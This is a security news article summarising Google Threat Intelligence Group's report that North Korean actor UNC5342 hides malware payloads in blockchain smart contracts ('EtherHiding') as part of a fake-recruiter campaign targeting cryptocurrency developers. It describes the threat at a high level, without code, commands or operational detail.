A North Korean threat actor has been found using a blockchain-based technique, known as ‘EtherHiding,’ to deliver malware to facilitate cryptocurrency theft.
EtherHiding is a technique where attackers embed malicious code, such as JavaScript payloads, inside a blockchain-based smart contract, effectively using the decentralized ledger as a resilient command-and-control (C2) server.
This is the first time Google Threat Intelligence Group (GTIG) has observed a nation-state actor adopting this method, it said in its blog published on October 16.
The use of EtherHiding is resilient against conventional takedown and blocklisting efforts, GTIG explained.
The threat intelligence group has tracked threat actor UNC5342 since February 2026 incorporating EtherHiding into an ongoing social engineering campaign.
EtherHiding Pros for Hackers, Cons for Defenders
EtherHiding offers several significant advantages to attackers, positioning it as a particularly challenging threat to mitigate, GTIG noted.
One element of EtherHiding that is particularly concerning is its decentralized nature. The malicious code is stored on a decentralized and permissionless blockchain, meaning there is no central server that law enforcement or cybersecurity firms can take down.
The identity of an attacker is also difficult to trace because of the pseudonymous nature of blockchain transactions.
It is also difficult to remove malicious code in smart contracts deployed on the blockchain, other than if you are the contract owner. The attacker who controls the smart contract can update the malicious payload at any time.
While security researchers attempt to warn the community by tagging a contract as malicious on official blockchain scanners (like the warning on BscScan in Figure 5), malicious activity can still be performed.
Finally, attackers can retrieve the malicious payload using read-only calls that do not leave a visible transaction history on the blockchain, making their activities harder to track.
The threat research report said that EtherHiding represents a “shift towards next-generation bulletproof hosting” where the inherent features of blockchain technology are used for malicious purposes.
EtherHiding Part of Elaborate North Korea Scam Campaign
Google has linked the use of EtherHiding to a social engineering campaign tracked by Palo Alto Networks as ‘Contagious Interview.’
In this campaign, the threat actor uses JADESNOW malware to deploy a JavaScript variant of INVISIBLEFERRET, which has led to numerous cryptocurrency heists.
The campaign targets developers in the cryptocurrency and technology sectors to steal sensitive data, cryptocurrency and gain persistent access to corporate networks.
It centers around elaborate social engineering tactics that mimic legitimate recruitment processes through fake recruiters and fabricated companies.
Fake recruiters lure candidates onto platforms like Telegram or Discord, then deliver malware through deceptive coding tests or fake software downloads disguised as technical assessments or interview fixes.
The campaign employs a multi-stage malware infection process (involving JADESNOW, BEAVERTAIL and INVISIBLEFERRET) to compromise the victim’s system, often affecting Windows, macOS and Linux systems.
